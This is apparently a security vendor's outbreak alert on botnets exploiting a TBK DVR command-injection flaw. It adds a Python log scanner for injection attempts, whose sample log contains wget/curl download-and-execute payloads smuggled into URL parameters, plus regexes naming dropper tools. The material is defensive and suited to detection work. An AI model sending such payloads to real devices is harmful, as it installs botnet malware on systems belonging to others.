TBK DVRs Botnet Attack
Widespread Exploitation Attempts Targeting IoT Device
https://www.fortiguard.com/encyclopedia/ips/55717
Threat actors are actively exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR (digital video recorder) devices. The flaw allows unauthenticated remote code execution (RCE) via crafted HTTP requests to the device's web interface. Compromised devices are conscripted into botnets used to conduct DDoS attacks.
Background
FortiGuard Labs has detected a significant increase in malicious network activity exploiting CVE-2024-3721, a critical unauthenticated command injection vulnerability affecting TBK DVR devices. FortiGuard's global network of intrusion prevention system (IPS) sensors has recorded over 60,000 detection events, indicating widespread and coordinated exploitation attempts. Our telemetry reveals that multiple botnet operators are actively leveraging this vulnerability to expand their infrastructure. Notably, we have observed payloads and behaviors associated with the Condi, Fodcha, Mirai and Unstable botnet families, each known for targeting IoT devices to perform large-scale distributed denial-of-service (DDoS) attacks and establish persistent remote access. FortiGuard Labs continues to monitor this threat and will provide further intelligence as it becomes available. FortiGuard previously released an Outbreak Alert for a different TBK vulnerability (CVE-2018-9995), which was exploited to spread the remote access trojan HiatusRAT.
Latest Developments

No vendor-supplied patch or update is currently available for this issue; apply one as soon as it is released. Until then, isolate or replace affected TBK DVRs and monitor for unusual traffic patterns or binary drops originating from them. Organizations with internet-facing DVR systems are strongly urged to take immediate mitigation steps, including:
- Blocking known indicators of compromise (IoCs) linked to these botnets.
- Applying firmware patches or security updates from the vendor, if and when available.
- Restricting remote access to DVR interfaces and placing them behind firewalls or VPNs.
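As an added example (not FortiGuard's code, and not a description of the actual CVE-2024-3721 request format, which this alert does not give), the following Python script applies the monitoring advice above to a web-server or reverse-proxy access log sitting in front of DVR interfaces. It flags any request whose parameter values contain shell metacharacters, which a DVR configuration parameter should never carry, and raises the severity when the same value also contains the download-then-execute chain typical of Mirai-family droppers. The log lines, the `/cgi-bin/config.cgi` path and the IP addresses are constructed for the demonstration.

```python
"""Flag HTTP requests to a DVR web interface that look like command-injection
attempts. Added example for this alert, not FortiGuard code. The log lines and
the /cgi-bin/config.cgi path are constructed; the payload shape is the generic
Mirai-style "cd /tmp; wget ...; chmod ...; ./bin" chain, not the exact
CVE-2024-3721 request, which this alert does not describe.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# A DVR configuration parameter should never contain a shell separator,
# pipe, backtick, ampersand, newline or $( ... ) substitution.
SHELL_META = re.compile(r"\$\(|[;|`&\n]")

# Words that mark an IoT downloader chain; together with a metacharacter they
# turn a suspicious request into a probable malware drop.
DROPPER_WORDS = re.compile(
    r"\b(?:wget|curl|tftp|ftpget|busybox|chmod|sh)\b|/tmp/|/var/tmp/|/dev/shm/",
    re.IGNORECASE,
)

# Combined log format: src ident user [time] "METHOD target HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)


def param_values(query: str) -> list[str]:
    """Split a query string on '&' only, then percent-decode each value.

    Splitting is done by hand so that an injected ';' stays inside the value
    it was smuggled in (older urllib versions treated ';' as a separator).
    """
    values = []
    for pair in query.split("&"):
        if pair:
            _, _, value = pair.partition("=")
            values.append(unquote_plus(value))
    return values


def analyze_target(target: str) -> dict:
    """Classify the path?query part of a request line.

    Returns {"flag": bool, "severity": "high"|"medium"|None, "evidence": [...]}.
    """
    parts = urlsplit(target)
    values = param_values(parts.query) + [unquote_plus(parts.path)]
    evidence = [v for v in values if SHELL_META.search(v)]
    if not evidence:
        return {"flag": False, "severity": None, "evidence": []}
    has_dropper = any(DROPPER_WORDS.search(v) for v in evidence)
    return {
        "flag": True,
        "severity": "high" if has_dropper else "medium",
        "evidence": evidence,
    }


def scan_log(lines) -> list[dict]:
    """Return one record per flagged request, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        verdict = analyze_target(m["target"])
        if verdict["flag"]:
            hits.append({"src": m["src"], "ts": m["ts"],
                         "method": m["method"], "target": m["target"], **verdict})
    return hits


# Constructed sample log (RFC 5737 documentation addresses; hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2025:10:01:02 +0000] "GET /login.rsp?user=admin&page=1 HTTP/1.1" 200 512',
    # 'cmd=reboot' is a legitimate value: a command *name* alone is not injection
    '192.0.2.11 - - [15/Jul/2025:10:01:04 +0000] "GET /cgi-bin/status?cmd=reboot HTTP/1.1" 200 88',
    # download-chmod-execute chain smuggled into a parameter
    '198.51.100.7 - - [15/Jul/2025:10:02:17 +0000] "POST /cgi-bin/config.cgi?opt=sys&cmd=status'
    '&mdc=cd%20/tmp;wget%20http://203.0.113.5/arm7;chmod%20777%20arm7;./arm7%20dvr HTTP/1.1" 200 0',
    # percent-encoded $( ... ) substitution piping a script into sh
    '198.51.100.8 - - [15/Jul/2025:10:02:19 +0000] "GET /cgi-bin/config.cgi?name=%24(curl%20203.0.113.5/a.sh%7Csh) HTTP/1.1" 500 0',
    # bare pipe with no downloader keyword: still not a normal DVR parameter
    '198.51.100.9 - - [15/Jul/2025:10:02:25 +0000] "GET /cgi-bin/config.cgi?name=test%7Cid HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['severity'].upper():6} {hit['src']:14} {hit['method']} {hit['target']}")
        for e in hit["evidence"]:
            print(f"         evidence: {e!r}")
```

Run against a real access log by replacing `SAMPLE_LOG` with the file's lines. The decode-then-match order matters: matching on the raw, percent-encoded target would miss `%3B` and `%7C`, which is exactly how these payloads arrive. Every hit should be treated as a compromise indicator for the DVR, not just a blocked probe, because the flaw is unauthenticated and a single request is enough to run the dropper.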

PROTECT

Countermeasures across the Security Fabric for protecting assets, data and networks from cybersecurity events:

Lure

DB 20250715
Decoy VM

DB 20250715
AV

Detects known malware related to the Outbreak

DB 93.03734
AV (Pre-filter)

Detects known malware related to the Outbreak

DB 93.03734
Behavior Detection
IPS

Detects and blocks attack attempts leveraging the vulnerability

DB 28.829
Botnet C&C

DB 3.01340
DETECT

Find and correlate important information to identify an outbreak. The following updates are available to raise alerts and generate reports:

RESPOND

Develop containment techniques to mitigate impacts of security events:

Automated Response

Services that can automatically respond to this outbreak.

Assisted Response Services

Experts to assist you with analysis, containment and response activities.

RECOVER

Improve security posture and processes by implementing security awareness and training, in preparation for (and recovery from) security incidents:

NOC/SOC Training

Train your network and security professionals and optimize your incident response to stay on top of cyberattacks.

End-User Training

Raise security awareness among your employees, who are continuously targeted by phishing, drive-by downloads and other forms of cyberattack.

IDENTIFY

Identify processes and assets that need protection:

Attack Surface Hardening

Check Security Fabric devices to build actionable configuration recommendations and key indicators.